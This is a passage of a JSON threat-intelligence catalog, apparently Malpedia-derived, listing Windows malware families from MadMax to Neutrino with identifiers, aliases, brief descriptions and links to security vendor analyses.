"https://malpedia.caad.fkie.fraunhofer.de/details/win.madmax", "https://www.arbornetworks.com/blog/asert/mad-max-dga/" ], "synonyms": [], "type": [] }, "uuid": "42760c2c-bf00-4ace-871c-6dcbbd90b2de", "value": "MadMax" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.magala", "https://securelist.com/the-magala-trojan-clicker-a-hidden-advertising-threat/78920/" ], "synonyms": [], "type": [] }, "uuid": "192f93bc-fcf6-4aaf-ae2f-d9435a67e48b", "value": "Magala" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.magniber", "https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/", "https://www.youtube.com/watch?v=lqWJaaofNf4", "http://asec.ahnlab.com/1124" ], "synonyms": [], "type": [] }, "uuid": "fedac411-0638-48dc-8ac5-1b4171fa8a29", "value": "Magniber" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.majik_pos", "http://blog.trendmicro.com/trendlabs-security-intelligence/majikpos-combines-pos-malware-and-rats/" ], "synonyms": [], "type": [] }, "uuid": "c1144eb8-a2bc-48d7-b0fb-18f124c1f8d9", "value": "MajikPos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.makadocs", "http://contagiodump.blogspot.com/2012/12/nov-2012-backdoorw32makadocs-sample.html", "https://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs" ], "synonyms": [], "type": [] }, "uuid": "996e73e9-b093-4987-9992-f52008e55b24", "value": "Makadocs" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.makloader", "https://twitter.com/James_inthe_box/status/1046844087469391872" ], "synonyms": [], "type": [] }, "uuid": "7e088669-3ddb-4cc5-bc9b-ae59f61ada82", "value": "MakLoader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.maktub", "https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/", "https://bartblaze.blogspot.de/2018/04/maktub-ransomware-possibly-rebranded-as.html", "https://blog.malwarebytes.com/threat-analysis/2016/03/maktub-locker-beautiful-and-dangerous/" ], "synonyms": [], "type": [] }, "uuid": "bdb27944-1f79-46f7-a0d7-c344429790c2", "value": "Maktub" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.malumpos", "http://documents.trendmicro.com/images/tex/pdf/MalumPOS%20Technical%20Brief.pdf" ], "synonyms": [], "type": [] }, "uuid": "159b0dbf-52f6-4690-a545-0f890ba7b9b7", "value": "MalumPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mamba", "https://securelist.com/the-return-of-mamba-ransomware/79403/", "http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/" ], "synonyms": [ "DiskCryptor", "HDDCryptor" ], "type": [] }, "uuid": "df320366-7970-4af0-b1f4-9f9492dede53", "value": "Mamba" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.manamecrypt", "https://www.bleepingcomputer.com/news/security/cryptohost-decrypted-locks-files-in-a-password-protected-rar-file/", "https://www.gdatasoftware.com/blog/2016/04/28234-manamecrypt-a-ransomware-that-takes-a-different-route" ], "synonyms": [ "CryptoHost" ], "type": [] }, "uuid": "54cd671e-b7e4-4dd3-9bfa-dc0ba5105944", "value": "ManameCrypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mangzamel", "https://www.hybrid-analysis.com/sample/5d631d77401615d53f3ce3dbc2bfee5d934602dc35d488aa7cebf9b3ff1c4816?environmentId=2" ], "synonyms": [ "junidor", "mengkite", "vedratve" ], "type": [] }, "uuid": "ed3a94c9-8a5a-4ae7-bdd9-b000e01df3a0", "value": "Mangzamel" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.manifestus_ransomware", "https://twitter.com/struppigel/status/811587154983981056" ], "synonyms": [], "type": [] }, "uuid": "5b75db42-b8f2-4e52-81d3-f329e49e1af2", "value": "Manifestus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.manitsme", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "13b0d9ff-0be0-4539-8c86-dfca7a0e79f6", "value": "ManItsMe" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mapiget", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "8a97307f-a029-4c43-88e1-debed2b80b14", "value": "MAPIget" }, { "description": "Marap is a downloader, named after its command and control (C&C) phone home parameter \"param\" spelled backwards. It is written in C and contains a few notable anti-analysis features.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.marap", "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-prepare-more-part-1-marap" ], "synonyms": [], "type": [] }, "uuid": "c2c3ac24-6921-4bba-a2c8-ac3d364feaeb", "value": "Marap" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_banker", "https://www.arbornetworks.com/blog/asert/another-banker-enters-matrix/" ], "synonyms": [], "type": [] }, "uuid": "59717468-271e-4d15-859a-130681c17ddb", "value": "Matrix Banker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_ransom", "https://www.blackhoodie.re/assets/archive/Matrix_Ransomware_blackhoodie.pdf" ], "synonyms": [], "type": [] }, "uuid": "118ced99-5942-497f-885a-2b25d0569b4b", "value": "Matrix Ransom" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matryoshka_rat", "http://www.clearskysec.com/tulip/" ], "synonyms": [], "type": [] }, "uuid": "c8a7c6e7-c6d3-4978-8a1d-190162de5e0d", "value": "Matryoshka RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matsnu", "https://blog.checkpoint.com/wp-content/uploads/2015/07/matsnu-malwareid-technical-brief.pdf" ], "synonyms": [], "type": [] }, "uuid": "f566d597-d0c4-4932-b738-ac5774eedb7a", "value": "Matsnu" }, { "description": " This ransomware modifies the master boot record of the victim's computer so that it shows a ransom note before Windows starts.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlock", "http://id-ransomware.blogspot.com.tr/2018/02/mbrlock-hax-ransomware.html", "https://www.bleepingcomputer.com/news/security/dexcrypt-mbrlocker-demands-30-yuan-to-gain-access-to-computer/", "https://www.hybrid-analysis.com/sample/dfc56a704b5e031f3b0d2d0ea1d06f9157758ad950483b44ac4b77d33293cb38?environmentId=100", "https://app.any.run/tasks/0a7e643f-7562-4575-b8a5-747bd6b5f02d" ], "synonyms": [ "DexLocker" ], "type": [] }, "uuid": "41177275-7e6d-4ebd-a4df-d2cc733f7791", "value": "MBRlock" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mebromi", "https://www.symantec.com/connect/blogs/bios-threat-showing-again", "https://www.webroot.com//blog/2011/09/13/mebromi-the-first-bios-rootkit-in-the-wild/", "http://contagiodump.blogspot.com/2011/09/mebromi-bios-rootkit-affecting-award.html", "http://www.theregister.co.uk/2011/09/14/bios_rootkit_discovered/" ], "synonyms": [ "MyBios" ], "type": [] }, "uuid": "342be00c-cf68-45a6-8f90-3a2d2d20bda6", "value": "Mebromi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.medre", "http://contagiodump.blogspot.com/2012/06/medrea-autocad-worm-samples.html" ], "synonyms": [], "type": [] }, "uuid": "243ae1f7-183e-4ea9-82cf-3353a0ef78f4", "value": "Medre" }, { "description": "Medusa is a DDoS bot written in .NET 2.0. In its current incarnation its C&C protocol is based on HTTP, while its predecessor made use of IRC.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusa", "https://www.arbornetworks.com/blog/asert/medusahttp-ddos-slithers-back-spotlight/", "https://zerophagemalware.com/2017/10/13/rig-ek-via-malvertising-drops-a-miner/", "https://news.drweb.com/show/?i=10302&lng=en", "https://webcache.googleusercontent.com/search?q=cache:ZbKznF-dogcJ:https://www.toolbase.me/board/topic/10061-b-medusa-irc-ddos-botnet-bypass-cf-cookie-protections/" ], "synonyms": [], "type": [] }, "uuid": "237a1c2d-eb14-483d-9a2e-82f10b63ec06", "value": "Medusa" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.metamorfo", "https://blog.talosintelligence.com/2018/11/metamorfo-brazilian-campaigns.html", "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html" ], "synonyms": [ "Casbaneiro" ], "type": [] }, "uuid": "18dc3e7a-600d-4e5f-a283-86156b938530", "value": "Metamorfo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mewsei" ], "synonyms": [], "type": [] }, "uuid": "48cb12ee-c60a-46cd-b376-39226027c616", "value": "Mewsei" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.miancha", "https://www.contextis.com//documents/30/TA10009_20140127_-_CTI_Threat_Advisory_-_The_Monju_Incident1.pdf" ], "synonyms": [], "type": [] }, "uuid": "a3370013-6c47-422e-a4d4-1b86ee71e5e5", "value": "Miancha" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.micrass", "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" ], "synonyms": [], "type": [] }, "uuid": "6c09cc53-7160-47c6-8df8-3e0d42deb5a6", "value": "Micrass" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.microcin", "https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636/", "https://cdn.securelist.com/files/2017/09/Microcin_Technical_4PDF_eng_final_s.pdf" ], "synonyms": [], "type": [] }, "uuid": "185d8b28-0179-4ec6-a3c8-201b1936b9aa", "value": "Microcin" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.micropsia", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/", "http://blog.talosintelligence.com/2017/06/palestine-delphi.html", "https://research.checkpoint.com/apt-attack-middle-east-big-bang/" ], "synonyms": [], "type": [] }, "uuid": "b37f312f-a0b1-41a9-88ae-da2844c19cae", "value": "Micropsia" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mikoponi" ], "synonyms": [], "type": [] }, "uuid": "87abb59d-0012-4d45-9e75-136372b25bf8", "value": "Mikoponi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.milkmaid", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "801d8a6a-b7ba-4557-af5d-1005e53145e2", "value": "MILKMAID" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz", "https://github.com/gentilkiwi/mimikatz", "https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/", "http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle", " https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks" ], "synonyms": [], "type": [] }, "uuid": "588fb91d-59c6-4667-b299-94676d48b17b", "value": "MimiKatz" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.miniasp", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "a4f8bacf-2076-4e00-863c-874cdd833a41", "value": "MiniASP" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirage", "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/" ], "synonyms": [], "type": [] }, "uuid": "6f6da371-2d62-4245-9aa3-8570e39222ae", "value": "Mirage" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.miragefox", "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/" ], "synonyms": [], "type": [] }, "uuid": "b3e89b03-c5af-41cd-88b8-e15335abbb30", "value": "MirageFox" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirai", "https://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/", "https://www.incapsula.com/blog/new-mirai-variant-ddos-us-college.html", "https://twitter.com/PhysicalDrive0/status/830070569202749440" ], "synonyms": [], "type": [] }, "uuid": "17e12216-a303-4a00-8283-d3fe92d0934c", "value": "Mirai (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.misdat", "https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "d1597713-fe7a-45bd-8b59-1a13c7e097d8", "value": "Misdat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.misfox" ], "synonyms": [ "MixFox", "ModPack" ], "type": [] }, "uuid": "b4c33277-ec15-4bb3-89ef-314ecfa100da", "value": "Misfox" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.miuref" ], "synonyms": [], "type": [] }, "uuid": "4c786624-4a55-46e6-849d-b65552034235", "value": "Miuref" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mm_core", "https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose" ], "synonyms": [], "type": [] }, "uuid": "6363cc2f-08f1-47a0-adbf-5cf19ea89ffd", "value": "MM Core" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mobi_rat", "https://blog.malwarebytes.com/threat-analysis/2017/07/malware-abusing-ffmpeg/" ], "synonyms": [], "type": [] }, "uuid": "e33aa1f8-a631-4274-afe0-f2fd3426332e", "value": "MobiRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mocton" ], "synonyms": [], "type": [] }, "uuid": "7132c1de-9a3f-4f08-955f-ab6f7a09e17d", "value": "Mocton" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.modpos", "https://www.fireeye.com/blog/threat-research/2015/11/modpos.html", "https://twitter.com/physicaldrive0/status/670258429202530306" ], "synonyms": [ "straxbot" ], "type": [] }, "uuid": "026d638b-cc51-4eff-97fc-d61215a1a70a", "value": "ModPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.moker", "https://breakingmalware.com/malware/moker-part-2-capabilities/", "https://blog.malwarebytes.com/threat-analysis/2017/04/elusive-moker-trojan/", "https://breakingmalware.com/malware/moker-part-1-dissecting-a-new-apt-under-the-microscope/", "http://blog.ensilo.com/moker-a-new-apt-discovered-within-a-sensitive-network" ], "synonyms": [], "type": [] }, "uuid": "90a1a61e-3e69-4b92-ac11-9095ac2d9cf4", "value": "Moker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mokes", "https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/" ], "synonyms": [], "type": [] }, "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", "value": "Mokes (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mole", "https://www.proofpoint.com/us/threat-insight/post/adgholas-malvertising-campaign-using-astrum-ek-deliver-mole-ransomware", "https://www.cert.pl/en/news/single/mole-ransomware-analysis-and-decryptor/" ], "synonyms": [], "type": [] }, "uuid": "aaeaf9ee-2f3d-4141-9d45-ec383ba8445f", "value": "Mole" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.molerat_loader", "http://www.clearskysec.com/iec/", "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/26000/PD26760/en_US/McAfee_Labs_Threat_Advisory_GazaCybergang.pdf" ], "synonyms": [], "type": [] }, "uuid": "b50408c3-6676-4d3f-8a97-9114c215b67a", "value": "Molerat Loader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.monero_miner", "https://www.welivesecurity.com/2017/09/28/monero-money-mining-malware/" ], "synonyms": [ "CoinMiner" ], "type": [] }, "uuid": "c57a4168-cd09-4611-a665-bbcede80f42b", "value": "Monero Miner" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.moonwind", "http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/" ], "synonyms": [], "type": [] }, "uuid": "8465177f-16c8-47fc-a4c8-f4c0409fe460", "value": "MoonWind" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.morphine" ], "synonyms": [], "type": [] }, "uuid": "9de41613-7762-4a88-8e9a-4e621a127f32", "value": "Morphine" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.morto", "http://contagiodump.blogspot.com/2011/08/aug-28-morto-tsclient-rdp-worm-with.html", "https://www.f-secure.com/weblog/archives/00002227.html", "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Morto.A" ], "synonyms": [], "type": [] }, "uuid": "c931dc7d-9373-4545-911c-ad5589670c40", "value": "Morto" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mosquito", "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/", "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf" ], "synonyms": [], "type": [] }, "uuid": "663df641-d396-4e93-93bd-bb9609ceb0ba", "value": "Mosquito" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.moure" ], "synonyms": [], "type": [] }, "uuid": "bd3468e4-5e00-46e6-a884-6eda1b246394", "value": "Moure" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mozart", "https://securitykitten.github.io/2015/01/11/the-mozart-ram-scraper.html" ], "synonyms": [], "type": [] }, "uuid": "dde61acb-8c0f-4a3a-8450-96e233f2ddc1", "value": "mozart" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mpkbot", "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" ], "synonyms": [], "type": [] }, "uuid": "2363dc9f-822a-4581-8d5f-1fc436e70621", "value": "MPKBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.multigrain_pos", "https://www.pandasecurity.com/mediacenter/malware/multigrain-malware-pos/", "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html" ], "synonyms": [], "type": [] }, "uuid": "c513c490-7c76-42ab-a51f-cc780faa7146", "value": "Multigrain POS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.murkytop", "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" ], "synonyms": [], "type": [] }, "uuid": "2685ea45-06f4-46e0-9397-eff8844db855", "value": "murkytop" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.murofet" ], "synonyms": [], "type": [] }, "uuid": "f7081626-130a-48d5-83a9-759b3ef198ec", "value": "Murofet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mutabaha", "http://vms.drweb.ru/virus/?_is=1&i=8477920" ], "synonyms": [], "type": [] }, "uuid": "771113e1-8550-4dc2-b2ad-7298ae381cb5", "value": "Mutabaha" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mykings_spreader", "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators", "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/" ], "synonyms": [], "type": [] }, "uuid": "ec9b2bf4-1c0b-4f3c-aaa6-909b19503eed", "value": "MyKings Spreader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mylobot", "https://www.deepinstinct.com/2018/06/20/meet-mylobot-a-new-highly-sophisticated-never-seen-before-botnet-thats-out-in-the-wild/" ], "synonyms": [], "type": [] }, "uuid": "98d375cb-f940-4bc7-a61e-f47bdcdc48e2", "value": "MyloBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.n40", "https://www.slideshare.net/elevenpaths/n40-the-botnet-created-in-brazil-which-evolves-to-attack-the-chilean-banking-sector" ], "synonyms": [], "type": [] }, "uuid": "6f0109a5-7cec-4a49-8b27-e18ad5c6cae6", "value": "N40" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nabucur" ], "synonyms": [], "type": [] }, "uuid": "ddf63295-cdba-4c70-a4c6-623ba2b5e6dd", "value": "Nabucur" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nagini", "http://bestsecuritysearch.com/voldemortnagini-ransomware-virus/" ], "synonyms": [], "type": [] }, "uuid": "0ec7d065-3418-43ba-a0cc-1e06471893ad", "value": "Nagini" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.naikon", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "dfb745f1-600a-4d31-a3b0-57bd0a72ac2e", "value": "Naikon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nanocore", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/" ], "synonyms": [], "type": [] }, "uuid": "f9aa9004-8811-4091-a471-38f81dbcadc4", "value": "Nanocore RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nano_locker" ], "synonyms": [], "type": [] }, "uuid": "00e1373c-fddf-4b06-9770-e980cc0ada6b", "value": "NanoLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.narilam", "http://contagiodump.blogspot.com/2012/12/nov-2012-w32narilam-sample.html", "https://www.symantec.com/connect/blogs/w32narilam-business-database-sabotage" ], "synonyms": [], "type": [] }, "uuid": "f5a262c7-59ed-42d1-884d-f8d29acf353f", "value": "Narilam" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nautilus", "https://www.ncsc.gov.uk/alerts/turla-group-malware" ], "synonyms": [], "type": [] }, "uuid": "d8295eba-60ef-4900-8091-d694180de565", "value": "Nautilus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.navrat", "https://blog.talosintelligence.com/2018/05/navrat.html?m=1" ], "synonyms": [], "type": [] }, "uuid": "ec0cad2c-0c13-491a-a869-1dc1758c8872", "value": "NavRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.necurs", "https://blog.avast.com/botception-with-necurs-botnet-distributes-script-with-bot-capabilities-avast-threat-labs", "https://www.bitsighttech.com/blog/necurs-proxy-module-with-ddos-features", "http://blog.talosintelligence.com/2017/03/necurs-diversifies.html", "https://www.blueliv.com/wp-content/uploads/2018/07/Blueliv-Necurs-report-2017.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Necurs-Recurs/", "https://blog.trendmicro.com/trendlabs-security-intelligence/the-new-face-of-necurs-noteworthy-changes-to-necurs-behaviors", "https://cofense.com/necurs-targeting-banks-pub-file-drops-flawedammyy/", "https://www.cert.pl/en/news/single/necurs-hybrid-spam-botnet/" ], "synonyms": [ "nucurs" ], "type": [] }, "uuid": "53ad08a6-cca9-401a-a6da-3c0bff2890eb", "value": "Necurs" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemim", "https://securelist.com/files/2014/11/darkhotelappendixindicators_kl.pdf" ], "synonyms": [ "Nemain" ], "type": [] }, "uuid": "5ce7906e-b1fd-4860-b3e2-ac9c72033428", "value": "Nemim" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netc", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "0bc03bfa-1439-4162-bb33-ec9f8f952ee5", "value": "NetC" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neteagle", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [ "ScoutEagle" ], "type": [] }, "uuid": "3bb8052e-8ed2-48e3-a2cf-7358bae8c6b5", "value": "NETEAGLE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netrepser_keylogger", "https://labs.bitdefender.com/2017/05/inside-netrepser-a-javascript-based-targeted-attack/" ], "synonyms": [], "type": [] }, "uuid": "7c6ed154-3232-4b7a-80c3-8052ce0c7333", "value": "Netrepser" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netsupportmanager_rat", "http://www.netsupportmanager.com/index.asp", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-hoeflertext-popups-targeting-google-chrome-users-now-pushing-rat-malware/", "https://www.bleepingcomputer.com/news/security/hacked-steam-accounts-spreading-remote-access-trojan/" ], "synonyms": [], "type": [] }, "uuid": "42562c47-08e1-46bc-962c-28d1831d092b", "value": "NetSupportManager RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nettraveler", "https://www.proofpoint.com/us/threat-insight/post/nettraveler-apt-targets-russian-european-interests", "https://cdn.securelist.com/files/2014/07/kaspersky-the-net-traveler-part1-final.pdf" ], "synonyms": [ "TravNet" ], "type": [] }, "uuid": "3a26ee44-3224-48f3-aefb-3978c972d928", "value": "NetTraveler" }, { "description": "Netwire is a RAT, its functionality seems focused on password stealing and keylogging, but includes remote control capabilities as well.\r\n\r\nKeylog files are stored on the infected machine in an obfuscated form. The algorithm is:\r\n\r\n for i in range(0,num_read):\r\n buffer[i] = ((buffer[i]-0x24)^0x9D)&0xFF\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", "http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/", "https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data", "http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html", "https://www.circl.lu/pub/tr-23/" ], "synonyms": [ "Recam" ], "type": [] }, "uuid": "1acd0c6c-7aff-462e-94ff-7544b1692740", "value": "NetWire RC" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neuron", "https://www.ncsc.gov.uk/alerts/turla-group-malware" ], "synonyms": [], "type": [] }, "uuid": "101c2c0e-c082-4b5a-b820-2da789e839d9", "value": "Neuron" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino", "https://securityblog.switch.ch/2017/07/07/94-ch-li-domain-names-hijacked-and-used-for-drive-by/", "https://blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/", "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet", "http://securitykitten.github.io/an-evening-with-n3utrino/", "https://blog.malwarebytes.com/threat-analysis/2017/02/new-neutrino-bot-comes-in-a-protective-loader/", "https://blog.malwarebytes.com/cybercrime/2017/01/post-holiday-spam-campaign-delivers-neutrino-bot/", "http://blog.trendmicro.com/trendlabs-security-intelligence/credit-card-scraping-kasidet-builder-leads-to-spike-in-detections/", 